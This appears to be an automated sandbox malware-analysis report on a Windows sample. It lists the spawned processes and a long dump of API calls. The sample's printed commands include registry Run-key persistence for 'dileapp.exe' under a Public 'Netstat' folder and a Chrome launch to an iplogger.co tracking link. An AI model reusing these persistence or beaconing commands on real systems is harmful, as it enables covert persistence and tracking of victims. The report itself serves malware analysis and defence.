                                                                                        2024-11-30 11:49:05 UTC1389INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4d 4c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4d 4c 22 20 53 3d 22
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.ML.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenML" S="


                                                                                        Click to jump to process

                                                                                        Click to jump to process

                                                                                        Click to dive into process behavior distribution

                                                                                        Click to jump to process

                                                                                        Target ID:0
                                                                                        Start time:06:46:58
                                                                                        Start date:30/11/2024
                                                                                        Path:C:\Users\user\Desktop\file.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                        Imagebase:0x870000
                                                                                        File size:4'963'581 bytes
                                                                                        MD5 hash:B9657F229C7591F44DBEF1BFB5C2BE01
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        Target ID:1
                                                                                        Start time:06:46:59
                                                                                        Start date:30/11/2024
                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\s.bat" "
                                                                                        Imagebase:0x240000
                                                                                        File size:236'544 bytes
                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:2
                                                                                        Start time:06:46:59
                                                                                        Start date:30/11/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:3
                                                                                        Start time:06:46:59
                                                                                        Start date:30/11/2024
                                                                                        Path:C:\Windows\SysWOW64\reg.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\dileapp.exe"
                                                                                        Imagebase:0x80000
                                                                                        File size:59'392 bytes
                                                                                        MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:4
                                                                                        Start time:06:46:59
                                                                                        Start date:30/11/2024
                                                                                        Path:C:\Windows\SysWOW64\reg.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\dileapp.exe"
                                                                                        Imagebase:0x80000
                                                                                        File size:59'392 bytes
                                                                                        MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:5
                                                                                        Start time:06:47:04
                                                                                        Start date:30/11/2024
                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.co/1tJFB4
                                                                                        Imagebase:0x7ff76e190000
                                                                                        File size:3'242'272 bytes
                                                                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:false

                                                                                        Target ID:7
                                                                                        Start time:06:47:05
                                                                                        Start date:30/11/2024
                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 --field-trial-handle=1980,i,4637800445937414229,16644580557611955956,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                        Imagebase:0x7ff76e190000
                                                                                        File size:3'242'272 bytes
                                                                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:false

                                                                                        Reset < >

                                                                                          Execution Graph

                                                                                          Execution Coverage:10.6%
                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                          Signature Coverage:9.5%
                                                                                          Total number of Nodes:1519
                                                                                          Total number of Limit Nodes:24
                                                                                          execution_graph 21931 871383 75 API calls 3 library calls 23846 879481 72 API calls 23107 88c782 23108 88c730 23107->23108 23108->23107 23109 88cabc ___delayLoadHelper2@8 19 API calls 23108->23109 23109->23108 23896 889584 GetDlgItem EnableWindow ShowWindow SendMessageW 23897 88899a GdipCloneImage GdipAlloc 23919 890e9d 48 API calls 23742 897695 23743 8976a0 23742->23743 23744 8979a7 11 API calls 23743->23744 23745 8976c9 23743->23745 23746 8976c5 23743->23746 23744->23743 23748 8976ed DeleteCriticalSection 23745->23748 23748->23746 23922 877a9b GetCurrentProcess GetLastError CloseHandle 23955 88aa99 91 API calls 3 library calls 23923 898aaa GetProcessHeap 23767 8710a9 23772 875b35 23767->23772 23773 875b3f __EH_prolog 23772->23773 23774 87ac66 75 API calls 23773->23774 23775 875b4b 23774->23775 23779 875d2a GetCurrentProcess GetProcessAffinityMask 23775->23779 23783 898abc 31 API calls ___delayLoadHelper2@8 23958 88e7b0 51 API calls 2 library calls 23959 884fb5 120 API calls __vswprintf_c_l 23960 896fcb 71 API calls _free 23926 8886cb 22 API calls 23927 897ecd 6 API calls ___delayLoadHelper2@8 23928 88aa99 101 API calls 4 library calls 23057 88c7c0 23058 88c791 23057->23058 23060 88cabc 23058->23060 23088 88c7ca 23060->23088 23062 88cad6 23063 88cb33 23062->23063 23066 88cb57 23062->23066 23099 88ca3a 11 API calls 3 library calls 23063->23099 23065 88cb3e RaiseException 23067 88cd2c 23065->23067 23068 88cbcf LoadLibraryExA 23066->23068 23070 88cc30 23066->23070 23076 88cc42 23066->23076 23084 88ccfe 23066->23084 23069 88d783 ___delayLoadHelper2@8 5 API calls 23067->23069 23068->23070 23071 88cbe2 GetLastError 23068->23071 23072 88cd3b 23069->23072 23070->23076 23077 88cc3b FreeLibrary 23070->23077 23073 88cc0b 23071->23073 23074 88cbf5 23071->23074 23072->23058 23100 88ca3a 11 API calls 3 library calls 23073->23100 23074->23070 23074->23073 23075 88cca0 GetProcAddress 23079 88ccb0 GetLastError 23075->23079 23075->23084 23076->23075 23076->23084 23077->23076 23081 88ccc3 23079->23081 23080 88cc16 RaiseException 23080->23067 23081->23084 23101 88ca3a 11 API calls 3 library calls 23081->23101 23102 88ca3a 11 API calls 3 library calls 23084->23102 23085 88cce4 RaiseException 23086 88c7ca ___delayLoadHelper2@8 11 API calls 23085->23086 23087 88ccfb 23086->23087 23087->23084 23089 88c7fc 23088->23089 23090 88c7d6 23088->23090 23089->23062 23103 88c878 8 API calls 2 library calls 23090->23103 23092 88c7db 23093 88c7f7 23092->23093 23104 88c9ca VirtualQuery GetSystemInfo VirtualProtect DloadObtainSection DloadMakePermanentImageCommit 23092->23104 23105 88c7fd GetModuleHandleW GetProcAddress GetProcAddress 23093->23105 23096 88d783 ___delayLoadHelper2@8 5 API calls 23097 88cab8 23096->23097 23097->23062 23098 88ca87 23098->23096 23099->23065 23100->23080 23101->23085 23102->23067 23103->23092 23104->23093 23105->23098 23962 8863c3 115 API calls 23111 879bc8 23112 879bdb 23111->23112 23116 879bd4 23111->23116 23113 879be1 GetStdHandle 23112->23113 23121 879bec 23112->23121 23113->23121 23114 879c41 WriteFile 23114->23121 23115 879c11 WriteFile 23118 879c0c 23115->23118 23115->23121 23118->23115 23118->23121 23119 879cb4 23123 876f67 68 API calls 23119->23123 23121->23114 23121->23115 23121->23116 23121->23118 23121->23119 23122 876d5a 56 API calls 23121->23122 23122->23121 23123->23116 23857 88aa99 96 API calls 4 library calls 23963 894bda 52 API calls 3 library calls 23131 88c0d0 23132 88c0dd 23131->23132 23133 87d142 54 API calls 23132->23133 23134 88c0f1 23133->23134 23135 873f5b _swprintf 51 API calls 23134->23135 23136 88c103 SetDlgItemTextW 23135->23136 23139 88991e PeekMessageW 23136->23139 23140 889939 GetMessageW TranslateMessage DispatchMessageW 23139->23140 23141 88995a 23139->23141 23140->23141 23862 887cd5 GetClientRect 23899 87ddda FreeLibrary 23930 894ed4 55 API calls _free 23964 88c3ea 19 API calls ___delayLoadHelper2@8 23931 8716e3 79 API calls 23863 89c0e4 51 API calls 23865 8988fb GetCommandLineA GetCommandLineW 23902 88d5ff 27 API calls pre_c_initialization 23785 8718fb 127 API calls __EH_prolog 23903 893501 QueryPerformanceFrequency QueryPerformanceCounter 23968 89c301 21 API calls __vswprintf_c_l 23935 890a00 6 API calls 4 library calls 23870 88d002 38 API calls 2 library calls 23969 896f03 21 API calls 2 library calls 23142 88d611 23143 88d61d ___DestructExceptionObject 23142->23143 23168 88d126 23143->23168 23145 88d624 23147 88d64d 23145->23147 23245 88da75 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 23145->23245 23155 88d68c ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 23147->23155 23179 89572c 23147->23179 23151 88d66c ___DestructExceptionObject 23152 88d6ec 23187 88db90 23152->23187 23155->23152 23246 894760 38 API calls 4 library calls 23155->23246 23163 88d718 23165 88d721 23163->23165 23247 894b67 28 API calls _abort 23163->23247 23248 88d29d 13 API calls 2 library calls 23165->23248 23169 88d12f 23168->23169 23249 88d8cb IsProcessorFeaturePresent 23169->23249 23171 88d13b 23250 890b66 23171->23250 23173 88d140 23174 88d144 23173->23174 23259 8955b9 23173->23259 23174->23145 23177 88d15b 23177->23145 23180 895743 23179->23180 23181 88d783 ___delayLoadHelper2@8 5 API calls 23180->23181 23182 88d666 23181->23182 23182->23151 23183 8956d0 23182->23183 23186 8956ff 23183->23186 23184 88d783 ___delayLoadHelper2@8 5 API calls 23185 895728 23184->23185 23185->23155 23186->23184 23372 88dea0 23187->23372 23190 88d6f2 23191 89567d 23190->23191 23374 898558 23191->23374 23193 895686 23194 88d6fb 23193->23194 23378 8988e3 38 API calls 23193->23378 23196 88c131 23194->23196 23499 87f353 23196->23499 23200 88c150 23548 889036 23200->23548 23202 88c159 23552 880722 GetCPInfo 23202->23552 23204 88c163 ___scrt_fastfail 23205 88c176 GetCommandLineW 23204->23205 23206 88c203 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 23205->23206 23207 88c185 23205->23207 23208 873f5b _swprintf 51 API calls 23206->23208 23580 88a8d4 76 API calls 23207->23580 23210 88c26c SetEnvironmentVariableW GetModuleHandleW LoadIconW 23208->23210 23555 889a76 LoadBitmapW 23210->23555 23211 88c18b 23213 88c1fd 23211->23213 23214 88c193 OpenFileMappingW 23211->23214 23582 88be0a SetEnvironmentVariableW SetEnvironmentVariableW 23213->23582 23217 88c1ac MapViewOfFile 23214->23217 23218 88c1f3 CloseHandle 23214->23218 23220 88c1ea UnmapViewOfFile 23217->23220 23221 88c1bd __vswprintf_c_l 23217->23221 23218->23206 23220->23218 23581 88be0a SetEnvironmentVariableW SetEnvironmentVariableW 23221->23581 23223 88c2b3 23225 88c2c5 DialogBoxParamW 23223->23225 23224 88c1d9 23224->23220 23226 88c2ff 23225->23226 23227 88c318 23226->23227 23228 88c311 Sleep 23226->23228 23230 88c326 23227->23230 23583 889237 CompareStringW SetCurrentDirectoryW ___scrt_fastfail 23227->23583 23228->23227 23231 88c345 DeleteObject 23230->23231 23232 88c35c DeleteObject 23231->23232 23233 88c35f 23231->23233 23232->23233 23234 88c390 23233->23234 23235 88c3a2 23233->23235 23584 88be69 WaitForSingleObject PeekMessageW WaitForSingleObject 23234->23584 23578 88909e 23235->23578 23238 88c396 CloseHandle 23238->23235 23239 88c3dc 23240 894a9b GetModuleHandleW 23239->23240 23241 88d70e 23240->23241 23241->23163 23242 894bc4 23241->23242 23691 894941 23242->23691 23245->23145 23246->23152 23247->23165 23248->23151 23249->23171 23251 890b6b ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 23250->23251 23263 891c0e 23251->23263 23254 890b79 23254->23173 23256 890b81 23257 890b8c 23256->23257 23277 891c4a DeleteCriticalSection 23256->23277 23257->23173 23305 898ac5 23259->23305 23262 890b8f 8 API calls 3 library calls 23262->23174 23264 891c17 23263->23264 23266 891c40 23264->23266 23268 890b75 23264->23268 23278 891e85 23264->23278 23283 891c4a DeleteCriticalSection 23266->23283 23268->23254 23269 890ca6 23268->23269 23298 891d9a 23269->23298 23271 890cb0 23276 890cbb 23271->23276 23303 891e48 6 API calls try_get_function 23271->23303 23273 890cc9 23274 890cd6 23273->23274 23304 890cd9 6 API calls ___vcrt_FlsFree 23273->23304 23274->23256 23276->23256 23277->23254 23284 891c79 23278->23284 23281 891ebc InitializeCriticalSectionAndSpinCount 23282 891ea8 23281->23282 23282->23264 23283->23268 23285 891cad 23284->23285 23289 891ca9 23284->23289 23285->23281 23285->23282 23286 891ccd 23286->23285 23288 891cd9 GetProcAddress 23286->23288 23290 891ce9 __crt_fast_encode_pointer 23288->23290 23289->23285 23289->23286 23291 891d19 23289->23291 23290->23285 23292 891d41 LoadLibraryExW 23291->23292 23297 891d36 23291->23297 23293 891d5d GetLastError 23292->23293 23294 891d75 23292->23294 23293->23294 23295 891d68 LoadLibraryExW 23293->23295 23296 891d8c FreeLibrary 23294->23296 23294->23297 23295->23294 23296->23297 23297->23289 23299 891c79 try_get_function 5 API calls 23298->23299 23300 891db4 23299->23300 23301 891dcc TlsAlloc 23300->23301 23302 891dbd 23300->23302 23302->23271 23303->23273 23304->23276 23308 898ae2 23305->23308 23309 898ade 23305->23309 23306 88d783 ___delayLoadHelper2@8 5 API calls 23307 88d14d 23306->23307 23307->23177 23307->23262 23308->23309 23311 8971c0 23308->23311 23309->23306 23312 8971cc ___DestructExceptionObject 23311->23312 23323 8976d6 EnterCriticalSection 23312->23323 23314 8971d3 23324 898f93 23314->23324 23316 8971e2 23317 8971f1 23316->23317 23337 897054 29 API calls 23316->23337 23339 89720d LeaveCriticalSection _abort 23317->23339 23320 8971ec 23338 89710a GetStdHandle GetFileType 23320->23338 23321 897202 ___DestructExceptionObject 23321->23308 23323->23314 23325 898f9f ___DestructExceptionObject 23324->23325 23326 898fac 23325->23326 23327 898fc3 23325->23327 23348 895e3e 20 API calls __dosmaperr 23326->23348 23340 8976d6 EnterCriticalSection 23327->23340 23330 898fb1 23349 895d1d 26 API calls pre_c_initialization 23330->23349 23332 898fbb ___DestructExceptionObject 23332->23316 23333 898ffb 23350 899022 LeaveCriticalSection _abort 23333->23350 23335 898fcf 23335->23333 23341 898ee4 23335->23341 23337->23320 23338->23317 23339->23321 23340->23335 23342 895a8d pre_c_initialization 20 API calls 23341->23342 23343 898ef6 23342->23343 23347 898f03 23343->23347 23351 8979a7 23343->23351 23344 8959c2 _free 20 API calls 23346 898f55 23344->23346 23346->23335 23347->23344 23348->23330 23349->23332 23350->23332 23358 897735 23351->23358 23354 8979ec InitializeCriticalSectionAndSpinCount 23355 8979d7 23354->23355 23356 88d783 ___delayLoadHelper2@8 5 API calls 23355->23356 23357 897a03 23356->23357 23357->23343 23359 897761 23358->23359 23360 897765 23358->23360 23359->23360 23363 897785 23359->23363 23365 8977d1 23359->23365 23360->23354 23360->23355 23362 897791 GetProcAddress 23364 8977a1 __crt_fast_encode_pointer 23362->23364 23363->23360 23363->23362 23364->23360 23366 8977f2 LoadLibraryExW 23365->23366 23371 8977e7 23365->23371 23367 89780f GetLastError 23366->23367 23368 897827 23366->23368 23367->23368 23369 89781a LoadLibraryExW 23367->23369 23370 89783e FreeLibrary 23368->23370 23368->23371 23369->23368 23370->23371 23371->23359 23373 88dba3 GetStartupInfoW 23372->23373 23373->23190 23375 898561 23374->23375 23377 89856a 23374->23377 23379 898457 23375->23379 23377->23193 23378->23193 23380 89631f pre_c_initialization 38 API calls 23379->23380 23381 898464 23380->23381 23399 898576 23381->23399 23383 89846c 23408 8981eb 23383->23408 23385 898483 23385->23377 23387 8959fc __onexit 21 API calls 23388 898494 23387->23388 23389 8984c6 23388->23389 23415 898618 23388->23415 23391 8959c2 _free 20 API calls 23389->23391 23391->23385 23393 8984c1 23425 895e3e 20 API calls __dosmaperr 23393->23425 23395 89850a 23395->23389 23426 8980c1 26 API calls 23395->23426 23396 8984de 23396->23395 23397 8959c2 _free 20 API calls 23396->23397 23397->23395 23400 898582 ___DestructExceptionObject 23399->23400 23401 89631f pre_c_initialization 38 API calls 23400->23401 23406 89858c 23401->23406 23403 898610 ___DestructExceptionObject 23403->23383 23406->23403 23407 8959c2 _free 20 API calls 23406->23407 23427 895a4a 38 API calls _abort 23406->23427 23428 8976d6 EnterCriticalSection 23406->23428 23429 898607 LeaveCriticalSection _abort 23406->23429 23407->23406 23409 892636 __fassign 38 API calls 23408->23409 23410 8981fd 23409->23410 23411 89820c GetOEMCP 23410->23411 23412 89821e 23410->23412 23413 898235 23411->23413 23412->23413 23414 898223 GetACP 23412->23414 23413->23385 23413->23387 23414->23413 23416 8981eb 40 API calls 23415->23416 23418 898637 23416->23418 23417 88d783 ___delayLoadHelper2@8 5 API calls 23419 8984b9 23417->23419 23420 898688 IsValidCodePage 23418->23420 23422 89863e 23418->23422 23424 8986ad ___scrt_fastfail 23418->23424 23419->23393 23419->23396 23421 89869a GetCPInfo 23420->23421 23420->23422 23421->23422 23421->23424 23422->23417 23430 8982c3 GetCPInfo 23424->23430 23425->23389 23426->23389 23428->23406 23429->23406 23431 8983a7 23430->23431 23437 8982fd 23430->23437 23434 88d783 ___delayLoadHelper2@8 5 API calls 23431->23434 23436 898453 23434->23436 23436->23422 23440 8993f3 23437->23440 23439 8975cb __vswprintf_c_l 43 API calls 23439->23431 23441 892636 __fassign 38 API calls 23440->23441 23442 899413 MultiByteToWideChar 23441->23442 23444 8994e9 23442->23444 23445 899451 23442->23445 23446 88d783 ___delayLoadHelper2@8 5 API calls 23444->23446 23447 8959fc __onexit 21 API calls 23445->23447 23450 899472 __vswprintf_c_l ___scrt_fastfail 23445->23450 23448 89835e 23446->23448 23447->23450 23454 8975cb 23448->23454 23449 8994e3 23459 897616 20 API calls _free 23449->23459 23450->23449 23452 8994b7 MultiByteToWideChar 23450->23452 23452->23449 23453 8994d3 GetStringTypeW 23452->23453 23453->23449 23455 892636 __fassign 38 API calls 23454->23455 23456 8975de 23455->23456 23460 8973ae 23456->23460 23459->23444 23462 8973c9 __vswprintf_c_l 23460->23462 23461 8973ef MultiByteToWideChar 23463 897419 23461->23463 23464 8975a3 23461->23464 23462->23461 23467 8959fc __onexit 21 API calls 23463->23467 23470 89743a __vswprintf_c_l 23463->23470 23465 88d783 ___delayLoadHelper2@8 5 API calls 23464->23465 23466 8975b6 23465->23466 23466->23439 23467->23470 23468 8974ef 23496 897616 20 API calls _free 23468->23496 23469 897483 MultiByteToWideChar 23469->23468 23471 89749c 23469->23471 23470->23468 23470->23469 23487 897a09 23471->23487 23475 8974fe 23479 8959fc __onexit 21 API calls 23475->23479 23480 89751f __vswprintf_c_l 23475->23480 23476 8974c6 23476->23468 23477 897a09 __vswprintf_c_l 11 API calls 23476->23477 23477->23468 23478 897594 23495 897616 20 API calls _free 23478->23495 23479->23480 23480->23478 23481 897a09 __vswprintf_c_l 11 API calls 23480->23481 23483 897573 23481->23483 23483->23478 23484 897582 WideCharToMultiByte 23483->23484 23484->23478 23485 8975c2 23484->23485 23497 897616 20 API calls _free 23485->23497 23488 897735 pre_c_initialization 5 API calls 23487->23488 23489 897a30 23488->23489 23493 897a39 23489->23493 23498 897a91 10 API calls 3 library calls 23489->23498 23491 897a79 LCMapStringW 23491->23493 23492 88d783 ___delayLoadHelper2@8 5 API calls 23494 8974b3 23492->23494 23493->23492 23494->23468 23494->23475 23494->23476 23495->23468 23496->23464 23497->23468 23498->23491 23500 88cec0 23499->23500 23501 87f35d GetModuleHandleW 23500->23501 23502 87f377 GetProcAddress 23501->23502 23503 87f3c8 23501->23503 23505 87f3a0 GetProcAddress 23502->23505 23506 87f390 23502->23506 23504 87f6fd GetModuleFileNameW 23503->23504 23591 89462a 42 API calls __vswprintf_c_l 23503->23591 23519 87f718 23504->23519 23505->23503 23508 87f3ac 23505->23508 23506->23505 23508->23503 23509 87f63b 23509->23504 23510 87f646 GetModuleFileNameW CreateFileW 23509->23510 23511 87f675 SetFilePointer 23510->23511 23512 87f6f1 CloseHandle 23510->23512 23511->23512 23513 87f685 ReadFile 23511->23513 23512->23504 23513->23512 23516 87f6a4 23513->23516 23514 87a8e0 GetVersionExW 23514->23519 23516->23512 23518 87f309 2 API calls 23516->23518 23517 87f74d CompareStringW 23517->23519 23518->23516 23519->23514 23519->23517 23520 87f783 GetFileAttributesW 23519->23520 23521 87f797 23519->23521 23585 87f309 23519->23585 23520->23519 23520->23521 23522 87f7a4 23521->23522 23525 87f7d6 23521->23525 23524 87f7bc GetFileAttributesW 23522->23524 23527 87f7d0 23522->23527 23523 87f8e5 23547 888b8e GetCurrentDirectoryW 23523->23547 23524->23522 23524->23527 23525->23523 23526 87a8e0 GetVersionExW 23525->23526 23528 87f7f0 23526->23528 23527->23525 23529 87f7f7 23528->23529 23530 87f85d 23528->23530 23532 87f309 2 API calls 23529->23532 23531 873f5b _swprintf 51 API calls 23530->23531 23533 87f885 AllocConsole 23531->23533 23534 87f801 23532->23534 23535 87f892 GetCurrentProcessId AttachConsole 23533->23535 23536 87f8dd ExitProcess 23533->23536 23537 87f309 2 API calls 23534->23537 23592 8920b3 23535->23592 23539 87f80b 23537->23539 23541 87d142 54 API calls 23539->23541 23540 87f8b3 GetStdHandle WriteConsoleW Sleep FreeConsole 23540->23536 23542 87f826 23541->23542 23543 873f5b _swprintf 51 API calls 23542->23543 23544 87f839 23543->23544 23545 87d142 54 API calls 23544->23545 23546 87f848 23545->23546 23546->23536 23547->23200 23549 87f309 2 API calls 23548->23549 23550 88904a OleInitialize 23549->23550 23551 88906d GdiplusStartup SHGetMalloc 23550->23551 23551->23202 23553 880746 IsDBCSLeadByte 23552->23553 23553->23553 23554 88075e 23553->23554 23554->23204 23556 889aa0 GetObjectW 23555->23556 23557 889a97 23555->23557 23558 888ac0 6 API calls 23556->23558 23594 888bd0 FindResourceW 23557->23594 23562 889ab2 23558->23562 23561 889af3 23573 87caa7 23561->23573 23562->23561 23563 889ad3 23562->23563 23564 888bd0 13 API calls 23562->23564 23610 888b22 GetDC GetDeviceCaps ReleaseDC 23563->23610 23566 889ac8 23564->23566 23566->23563 23568 889ace DeleteObject 23566->23568 23567 889adb 23611 888adf GetDC GetDeviceCaps ReleaseDC 23567->23611 23568->23563 23570 889ae4 23612 888cf3 8 API calls ___scrt_fastfail 23570->23612 23572 889aeb DeleteObject 23572->23561 23621 87cacc 23573->23621 23577 87caba 23577->23223 23579 8890c4 GdiplusShutdown CoUninitialize 23578->23579 23579->23239 23580->23211 23581->23224 23582->23206 23583->23230 23584->23238 23586 88cec0 23585->23586 23587 87f316 GetSystemDirectoryW 23586->23587 23588 87f32e 23587->23588 23589 87f34c 23587->23589 23590 87f33f LoadLibraryW 23588->23590 23589->23519 23590->23589 23591->23509 23593 8920bb 23592->23593 23593->23540 23593->23593 23595 888bf1 SizeofResource 23594->23595 23596 888c23 23594->23596 23595->23596 23597 888c05 LoadResource 23595->23597 23596->23556 23597->23596 23598 888c16 LockResource 23597->23598 23598->23596 23599 888c2a GlobalAlloc 23598->23599 23599->23596 23600 888c41 GlobalLock 23599->23600 23601 888cb8 GlobalFree 23600->23601 23602 888c4c __vswprintf_c_l 23600->23602 23601->23596 23603 888c54 CreateStreamOnHGlobal 23602->23603 23604 888c6c 23603->23604 23605 888cb1 GlobalUnlock 23603->23605 23613 888b65 GdipAlloc 23604->23613 23605->23601 23608 888ca6 23608->23605 23609 888c90 GdipCreateHBITMAPFromBitmap 23609->23608 23610->23567 23611->23570 23612->23572 23614 888b84 23613->23614 23615 888b77 23613->23615 23614->23605 23614->23608 23614->23609 23617 888924 23615->23617 23618 88894c GdipCreateBitmapFromStream 23617->23618 23619 888945 GdipCreateBitmapFromStreamICM 23617->23619 23620 888951 23618->23620 23619->23620 23620->23614 23622 87cad6 _wcschr __EH_prolog 23621->23622 23623 87cb02 GetModuleFileNameW 23622->23623 23624 87cb33 23622->23624 23625 87cb1c 23623->23625 23644 87973d 23624->23644 23625->23624 23627 879437 72 API calls 23628 87cab3 23627->23628 23640 87ce48 GetModuleHandleW FindResourceW 23628->23640 23629 87cb63 23630 87cc9f 23629->23630 23639 87cce9 23629->23639 23653 879aeb 23629->23653 23661 87990d 23629->23661 23669 8799e0 23629->23669 23632 8799e0 70 API calls 23630->23632 23630->23639 23634 87ccb9 new 23632->23634 23635 87990d 73 API calls 23634->23635 23634->23639 23636 87ccdf new 23635->23636 23636->23639 23674 8806e9 MultiByteToWideChar 23636->23674 23639->23627 23641 87ce76 23640->23641 23643 87ce70 23640->23643 23642 87c91f 52 API calls 23641->23642 23642->23643 23643->23577 23645 879747 23644->23645 23646 87979d CreateFileW 23645->23646 23647 87981b 23646->23647 23648 8797ca GetLastError 23646->23648 23647->23629 23649 87b275 2 API calls 23648->23649 23650 8797ea 23649->23650 23650->23647 23651 8797ee CreateFileW GetLastError 23650->23651 23652 879812 23651->23652 23652->23647 23654 879b0f SetFilePointer 23653->23654 23655 879afe 23653->23655 23656 879b2d GetLastError 23654->23656 23657 879b48 23654->23657 23655->23657 23675 876eae 68 API calls 23655->23675 23656->23657 23659 879b37 23656->23659 23657->23629 23659->23657 23676 876eae 68 API calls 23659->23676 23664 879924 23661->23664 23663 879985 23663->23629 23664->23663 23665 879987 23664->23665 23666 879977 23664->23666 23677 879613 23664->23677 23665->23663 23668 879613 5 API calls 23665->23668 23689 876e74 68 API calls 23666->23689 23668->23665 23670 879897 2 API calls 23669->23670 23672 8799f4 23670->23672 23671 879a0b 23671->23629 23672->23671 23690 876eae 68 API calls 23672->23690 23674->23639 23675->23654 23676->23657 23678 879621 GetStdHandle 23677->23678 23679 87962c ReadFile 23677->23679 23678->23679 23680 879645 23679->23680 23681 879665 23679->23681 23682 87971a GetFileType 23680->23682 23681->23664 23683 87964c 23682->23683 23684 87965a 23683->23684 23685 87966d GetLastError 23683->23685 23686 87967c 23683->23686 23687 879613 GetFileType 23684->23687 23685->23681 23685->23686 23686->23681 23688 87968c GetLastError 23686->23688 23687->23681 23688->23681 23688->23684 23689->23663 23690->23671 23692 89494d _abort 23691->23692 23693 894a9b _abort GetModuleHandleW 23692->23693 23699 894965 23692->23699 23695 894959 23693->23695 23695->23699 23725 894adf GetModuleHandleExW 23695->23725 23698 8949e2 23704 8949fa 23698->23704 23708 8956d0 _abort 5 API calls 23698->23708 23713 8976d6 EnterCriticalSection 23699->23713 23700 89496d 23700->23698 23712 894a0b 23700->23712 23733 895447 20 API calls _abort 23700->23733 23702 894a28 23717 894a5a 23702->23717 23703 894a54 23734 89f149 5 API calls ___delayLoadHelper2@8 23703->23734 23709 8956d0 _abort 5 API calls 23704->23709 23708->23704 23709->23712 23714 894a4b 23712->23714 23713->23700 23735 89771e LeaveCriticalSection 23714->23735 23716 894a24 23716->23702 23716->23703 23736 897b13 23717->23736 23720 894a88 23723 894adf _abort 8 API calls 23720->23723 23721 894a68 GetPEB 23721->23720 23722 894a78 GetCurrentProcess TerminateProcess 23721->23722 23722->23720 23724 894a90 ExitProcess 23723->23724 23726 894b09 GetProcAddress 23725->23726 23727 894b2c 23725->23727 23728 894b1e 23726->23728 23729 